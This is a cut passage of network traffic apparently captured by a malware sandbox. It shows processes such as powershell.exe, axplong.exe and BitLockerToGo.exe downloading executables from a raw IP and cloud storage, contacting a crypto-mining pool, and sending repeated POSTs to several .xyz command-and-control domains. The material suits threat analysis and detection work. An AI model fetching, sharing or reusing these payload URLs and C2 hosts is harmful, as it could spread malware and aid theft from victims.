github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: D048:1D6B6C:87022D:969653:667D722A
DNS

244.33.217.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

244.33.217.52.in-addr.arpa

IN PTR

Response

244.33.217.52.in-addr.arpa

IN PTR

s3-1-w amazonawscom
GET

https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/bff378a0-db1f-4958-863d-f942e941cea1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T140738Z&X-Amz-Expires=300&X-Amz-Signature=d67dbfa86479e323624991f0ecefb271d71aca6d369ab2367f3a7afa57fc8874&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DFile.zip&response-content-type=application%2Foctet-stream

powershell.exe

Remote address:

185.199.108.133:443

Request

GET /github-production-release-asset-2e65be/815364555/bff378a0-db1f-4958-863d-f942e941cea1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T140738Z&X-Amz-Expires=300&X-Amz-Signature=d67dbfa86479e323624991f0ecefb271d71aca6d369ab2367f3a7afa57fc8874&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DFile.zip&response-content-type=application%2Foctet-stream HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: objects.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 17056614
Content-Type: application/octet-stream
Last-Modified: Sat, 15 Jun 2024 00:49:00 GMT
ETag: "0x8DC8CD4F1FDDA6A"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bc1792bb-901e-005a-741c-c187b2000000
x-ms-version: 2020-10-02
x-ms-creation-time: Sat, 15 Jun 2024 00:49:00 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=File.zip
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Age: 440
Date: Thu, 27 Jun 2024 14:07:39 GMT
X-Served-By: cache-iad-kcgs7200033-IAD, cache-lcy-eglc8600067-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 1306, 0
X-Timer: S1719497259.715021,VS0,VE398
DNS

ocsp.r2m01.amazontrust.com

axplong.exe

Remote address:

8.8.8.8:53

Request

ocsp.r2m01.amazontrust.com

IN A

Response

ocsp.r2m01.amazontrust.com

IN A

143.204.67.183
GET

http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D

axplong.exe

Remote address:

143.204.67.183:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.r2m01.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=7200
Date: Thu, 27 Jun 2024 12:50:14 GMT
Last-Modified: Thu, 27 Jun 2024 12:50:14 GMT
Server: ECAcc (lhd/35BD)
X-Cache: Hit from cloudfront
Via: 1.1 3e01624605be2cc1fb592922856a08c6.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR61-P1
X-Amz-Cf-Id: NS7urbgH9R5png3K44hsmk8ZglIuxzIgifkKaOlfetA5LcwiZlVHag==
Age: 4645
DNS

190.178.204.143.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.178.204.143.in-addr.arpa

IN PTR

Response

190.178.204.143.in-addr.arpa

IN PTR

server-143-204-178-190lhr50r cloudfrontnet
DNS

113.216.138.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.216.138.108.in-addr.arpa

IN PTR

Response

113.216.138.108.in-addr.arpa

IN PTR

server-108-138-216-113lhr61r cloudfrontnet
DNS

183.67.204.143.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.67.204.143.in-addr.arpa

IN PTR

Response

183.67.204.143.in-addr.arpa

IN PTR

server-143-204-67-183lhr61r cloudfrontnet
DNS

67.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.65.42.5.in-addr.arpa

IN PTR

Response
DNS

101.58.20.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

101.58.20.217.in-addr.arpa

IN PTR

Response
GET

http://43.153.49.49:8888/down/TpWWMUpe0LEV.exe

axplong.exe

Remote address:

43.153.49.49:8888

Request

GET /down/TpWWMUpe0LEV.exe HTTP/1.1
Host: 43.153.49.49:8888

Response

HTTP/1.1 200 OK

Content-Disposition: attachment; filename=whiteheroin.exe
Content-Type: application/octet-stream
Content-Length: 1228288
Last-Modified: Wed, 26 Jun 2024 19:22:36 GMT
Cache-Control: no-cache, max-age=0
Expires: Thu, 27 Jun 2024 14:07:50 GMT
ETag: "1719429756.5317302-1228288-125308486"
Date: Thu, 27 Jun 2024 14:07:50 GMT
Server: nginx
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Set-Cookie: c50233950c3f39bd96d165eee1995d77=f4d1a01b-f180-4e0a-bb9a-aaf22def1fb8.aym6zxhoa1bDHMzEJkrcBcxIZM8; Expires=Sat, 27 Jul 2024 14:07:50 GMT; HttpOnly; Path=/
DNS

49.49.153.43.in-addr.arpa

Remote address:

8.8.8.8:53

Request

49.49.153.43.in-addr.arpa

IN PTR

Response
GET

https://bbuseruploads.s3.amazonaws.com/bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/925aca09-8171-4df5-9672-b014eb575c2b/build.exe?response-content-disposition=attachment%3B%20filename%3D%22build.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJRUG7J5N&Signature=Epl0KOTC8lg0Fz4JKCcVypH4PaA%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEYaCXVzLWVhc3QtMSJGMEQCIE%2BHVTXGemTUbrOtaikuqKKvmE3QV%2FzhLUJTXFr1PnyBAiBpURmnjYrXkR1SH56MeBpdFic304HJUKpNYAvk1v6knyqwAgjv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMm2s2wIqGNTrfGjaRKoQCVSaqpnN%2BJiceeABFd86CCwPvAjJXEQtgkhrukwMwPygvtn59lnTkC4T7oygKftcVPPFG6JHWgOcSLU1%2FEnCX6o3bB5Yz4qduAsfQ7Sgo1u5NvHwMFK50mZnJwbJmh311g91Snisj3JzIrD340LzeTTpzwwdguao2yJ7FSuj%2B5%2F32vAv51J4FHF7nIpwnTZBNVqnCOR%2BRWa926CyEf%2FoME2iQa0qlMY4ScPGU6yCk7U%2BVLVncaWHKsU5Yd2GD4AO%2FzcjeMsTAmk7rGwtc4SVdXwnf6rcTEfy1X%2Bbp8l3FPs9i0pcCC3RtEJEeztEQQP8Gr0dkRfkrrw0ew7h5nVOFp9HKklMwyN%2F1swY6ngFSKEp5NqRu5CPbpapHSjZOTFq0fiKvrFHnOo2kxhAY3OKqrbZBQNkIyJ9sH0v42luaOey5D2ZpuxX4Kf6%2Bt7HDg22kid4iFuU5xnKXb3J5RxuQo4RglAzrjBlIq6AxB%2Fi3f6fmFkJTXRZFCpHffYZdEqEgFiq97Z6%2BfI1Svfu8ONWwgzC%2FKDkAssoymtyC%2FaqN3XZPS7RNLLRqKhJLVw%3D%3D&Expires=1719498448

axplong.exe

Remote address:

52.217.33.244:443

Request

GET /bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/925aca09-8171-4df5-9672-b014eb575c2b/build.exe?response-content-disposition=attachment%3B%20filename%3D%22build.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJRUG7J5N&Signature=Epl0KOTC8lg0Fz4JKCcVypH4PaA%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEYaCXVzLWVhc3QtMSJGMEQCIE%2BHVTXGemTUbrOtaikuqKKvmE3QV%2FzhLUJTXFr1PnyBAiBpURmnjYrXkR1SH56MeBpdFic304HJUKpNYAvk1v6knyqwAgjv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMm2s2wIqGNTrfGjaRKoQCVSaqpnN%2BJiceeABFd86CCwPvAjJXEQtgkhrukwMwPygvtn59lnTkC4T7oygKftcVPPFG6JHWgOcSLU1%2FEnCX6o3bB5Yz4qduAsfQ7Sgo1u5NvHwMFK50mZnJwbJmh311g91Snisj3JzIrD340LzeTTpzwwdguao2yJ7FSuj%2B5%2F32vAv51J4FHF7nIpwnTZBNVqnCOR%2BRWa926CyEf%2FoME2iQa0qlMY4ScPGU6yCk7U%2BVLVncaWHKsU5Yd2GD4AO%2FzcjeMsTAmk7rGwtc4SVdXwnf6rcTEfy1X%2Bbp8l3FPs9i0pcCC3RtEJEeztEQQP8Gr0dkRfkrrw0ew7h5nVOFp9HKklMwyN%2F1swY6ngFSKEp5NqRu5CPbpapHSjZOTFq0fiKvrFHnOo2kxhAY3OKqrbZBQNkIyJ9sH0v42luaOey5D2ZpuxX4Kf6%2Bt7HDg22kid4iFuU5xnKXb3J5RxuQo4RglAzrjBlIq6AxB%2Fi3f6fmFkJTXRZFCpHffYZdEqEgFiq97Z6%2BfI1Svfu8ONWwgzC%2FKDkAssoymtyC%2FaqN3XZPS7RNLLRqKhJLVw%3D%3D&Expires=1719498448 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

x-amz-id-2: piNh4w2IvVOWzwGbAJdpx8p2uDovqh7Eu9guhPQ7AcMrp/ZT59BUkDqF9eoLHhqbw8UqjbPbRkg=
x-amz-request-id: 02JYHFAFXF3SP8Y7
Date: Thu, 27 Jun 2024 14:07:55 GMT
Last-Modified: Thu, 27 Jun 2024 11:56:05 GMT
ETag: "192dbecdb77a2ae3d473af7d8091e8a8-2"
x-amz-server-side-encryption: AES256
x-amz-version-id: 5EgZF_2aDVI8_qLw3Gkmu.Wuo8oRtrO7
Content-Disposition: attachment; filename="build.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 11267584
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

92.12.20.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.12.20.2.in-addr.arpa

IN PTR

Response

92.12.20.2.in-addr.arpa

IN PTR

a2-20-12-92deploystaticakamaitechnologiescom
DNS

ip-api.com

stub.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

ip-api.com

stub.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json

stub.exe

Remote address:

208.95.112.1:80

Request

GET /json HTTP/1.1
Host: ip-api.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.10 aiohttp/3.8.6

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:03 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

raw.githubusercontent.com

stub.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
DNS

zeph-eu2.nanopool.org

explorer.exe

Remote address:

8.8.8.8:53

Request

zeph-eu2.nanopool.org

IN A

Response

zeph-eu2.nanopool.org

IN A

51.210.150.92

zeph-eu2.nanopool.org

IN A

51.15.61.114

zeph-eu2.nanopool.org

IN A

51.15.89.13

zeph-eu2.nanopool.org

IN A

51.68.137.186

zeph-eu2.nanopool.org

IN A

163.172.171.111

zeph-eu2.nanopool.org

IN A

51.195.138.197

zeph-eu2.nanopool.org

IN A

51.195.43.17
DNS

pastebin.com

explorer.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.19.24

pastebin.com

IN A

104.20.4.235

pastebin.com

IN A

104.20.3.235
DNS

92.150.210.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.150.210.51.in-addr.arpa

IN PTR

Response

92.150.210.51.in-addr.arpa

IN PTR

vps-28f6100evpsovhnet
DNS

24.19.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.19.67.172.in-addr.arpa

IN PTR

Response
DNS

24.19.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.19.67.172.in-addr.arpa

IN PTR

Response
DNS

sweetcalcutangkdow.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

sweetcalcutangkdow.xyz

IN A

Response

sweetcalcutangkdow.xyz

IN A

104.21.23.74

sweetcalcutangkdow.xyz

IN A

172.67.209.200
POST

https://sweetcalcutangkdow.xyz/api

BitLockerToGo.exe

Remote address:

104.21.23.74:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sweetcalcutangkdow.xyz

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=klc617crffg1fjlrvbge8l60os; expires=Mon, 21-Oct-2024 07:54:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AkHJV8G52%2FLMLMj923uBlTL8J5JEDaZ6bBaUUMzQcciBdGYdmThtEtc66Qv5u2Zia9Ux0cTg1lZfECzRn%2Bkv22pWKt8Pj1DSj0dJHR8TJv1KURXhpGrstStGiYpICaoraznsyCnI3zoO"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89a601f49e5660fa-LHR
alt-svc: h3=":443"; ma=86400
POST

https://sweetcalcutangkdow.xyz/api

BitLockerToGo.exe

Remote address:

104.21.23.74:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sweetcalcutangkdow.xyz

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=7b4tabrqmmk3af1rm36mos4p8j; expires=Mon, 21-Oct-2024 07:54:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JjoT9rRMzL84VpvlKv8yRmx4KleVBW6iBm5PD3tN%2FCyAdwnkfhLyvTFbuukpI4iWSxCAGsqxjGhsgEp8Rznr4XS06eEOncoMr53V3VfCsVgapb3z44D9CBBubKjlosGWlla%2BNLX2r7vC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89a601fd395760fa-LHR
alt-svc: h3=":443"; ma=86400
DNS

exuberanttjdkwo.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

exuberanttjdkwo.xyz

IN A

Response

exuberanttjdkwo.xyz

IN A

104.21.33.45

exuberanttjdkwo.xyz

IN A

172.67.141.43
DNS

exuberanttjdkwo.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

exuberanttjdkwo.xyz

IN A

Response

exuberanttjdkwo.xyz

IN A

104.21.33.45

exuberanttjdkwo.xyz

IN A

172.67.141.43
DNS

74.23.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.23.21.104.in-addr.arpa

IN PTR

Response
POST

https://exuberanttjdkwo.xyz/api

BitLockerToGo.exe

Remote address:

104.21.33.45:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: exuberanttjdkwo.xyz

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=nmpqjrceb6mg3otg6dv89uva3c; expires=Mon, 21-Oct-2024 07:54:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QAbvchi4MlmjbufG8Iqcs5qkL7XKK6WtFiR0MpAf9VqBF9UGxrLQhG%2BiXtMtStRT7Zzple4R%2F0ceJmBEZGnrq4V7TwPqtHvKEhIU5hzaRCa7OFY8eJGkfC4sKksXe3C%2FtjNP7PMD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89a601f78e927321-LHR
alt-svc: h3=":443"; ma=86400
DNS

cooperatvassquaidmew.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

cooperatvassquaidmew.xyz

IN A

Response

cooperatvassquaidmew.xyz

IN A

104.21.25.166

cooperatvassquaidmew.xyz

IN A

172.67.134.100
POST

https://cooperatvassquaidmew.xyz/api

BitLockerToGo.exe

Remote address:

104.21.25.166:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cooperatvassquaidmew.xyz

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=tb5d41jsn42334d4986g5jb71i; expires=Mon, 21-Oct-2024 07:54:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WNnZWnvqviBMF56MR0t4NW9RVs2Rn%2FzeUZ7LHFVsMtppOJ6rPtaSZE5EGUHZqQ5XQSY5uhtR5ZJH2xRfCZo98Kb%2Fa6pX9x%2FyRKr%2BW9mOlCoVTzvY1OTtBys%2BtCQCDvl9cxmY%2FKcqovKswEs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89a601fa1ac260e2-LHR
alt-svc: h3=":443"; ma=86400
DNS

45.33.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.33.21.104.in-addr.arpa

IN PTR

Response
DNS

45.33.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.33.21.104.in-addr.arpa

IN PTR

Response
DNS

crisisrottenyjs.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

crisisrottenyjs.xyz

IN A

Response

crisisrottenyjs.xyz

IN A

104.21.72.52

crisisrottenyjs.xyz

IN A

172.67.175.165
POST

https://crisisrottenyjs.xyz/api

BitLockerToGo.exe

Remote address:

104.21.72.52:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: crisisrottenyjs.xyz

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=vt7ehvhknachbe7t77dbh1p2q2; expires=Mon, 21-Oct-2024 07:54:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LaaaXzukqYtqJbcRUAzDE7tYZ0MkF5N3GjzT2Ey6ku0vAE2WDlG8aZaV847t3ITqbR2nhCYZ05L7BPAZjxLxMnEfFHzOUzttFuH7gwDmfC6RL6FqELRLwv4pD3Hhv7DZDjyQog6o"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89a601ff4cd19402-LHR
alt-svc: h3=":443"; ma=86400
DNS

wordingnatturedowo.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

wordingnatturedowo.xyz

IN A

Response

wordingnatturedowo.xyz

IN A

172.67.160.107

wordingnatturedowo.xyz

IN A

104.21.49.80
POST

https://wordingnatturedowo.xyz/api

BitLockerToGo.exe

Remote address:

172.67.160.107:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: wordingnatturedowo.xyz

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=khtpa33kuttrg8oejh6vltahcd; expires=Mon, 21-Oct-2024 07:54:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6T9qTAc58z62kv3gbUYEbhSfusecJnteBHt2fnOZL0DD0e%2BcZrb9W8VlZ0V02ol4ZR%2FO7oJftta%2Fe%2FdeSXzofeGlJv648z1Hfy%2B8BE%2F8yLwqPBee67H7H56o%2FK9WvFuMQjC41edPWKe"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89a602041c4960f7-LHR
alt-svc: h3=":443"; ma=86400
DNS

166.25.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.25.21.104.in-addr.arpa

IN PTR

Response
DNS

166.25.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.25.21.104.in-addr.arpa

IN PTR
DNS

52.72.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.72.21.104.in-addr.arpa

IN PTR

Response
DNS

52.72.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.72.21.104.in-addr.arpa

IN PTR
DNS

107.160.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

107.160.67.172.in-addr.arpa

IN PTR

Response
DNS

107.160.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

107.160.67.172.in-addr.arpa

IN PTR
DNS

grandcommonyktsju.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

grandcommonyktsju.xyz

IN A

Response

grandcommonyktsju.xyz

IN A

104.21.78.151

grandcommonyktsju.xyz

IN A

172.67.223.83
DNS

grandcommonyktsju.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

grandcommonyktsju.xyz

IN A

Response

grandcommonyktsju.xyz

IN A

104.21.78.151

grandcommonyktsju.xyz

IN A

172.67.223.83
POST

https://grandcommonyktsju.xyz/api

BitLockerToGo.exe

Remote address:

104.21.78.151:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: grandcommonyktsju.xyz

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=47j8fikvm9vunqc70pfje2avd0; expires=Mon, 21-Oct-2024 07:54:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6JRlTrtzHX5HNpygKhZxHQp9yPTe26fXrvPnqrJQZ3yUwS53BsA%2BU%2FdA%2B938Mqa%2BJwXUD909KcbY5aOjQbdLZanMGPsCm5rNV7c8S2QwVmXxaJc6qC4Siakr%2B%2FfJ%2Bd1es4VEtIrQRS0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89a60206cd3e60ea-LHR
alt-svc: h3=":443"; ma=86400
DNS

qualificationjdwko.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

qualificationjdwko.xyz

IN A

Response

qualificationjdwko.xyz

IN A

172.67.191.93

qualificationjdwko.xyz

IN A

104.21.92.96
POST

https://qualificationjdwko.xyz/api

BitLockerToGo.exe

Remote address:

172.67.191.93:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: qualificationjdwko.xyz

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
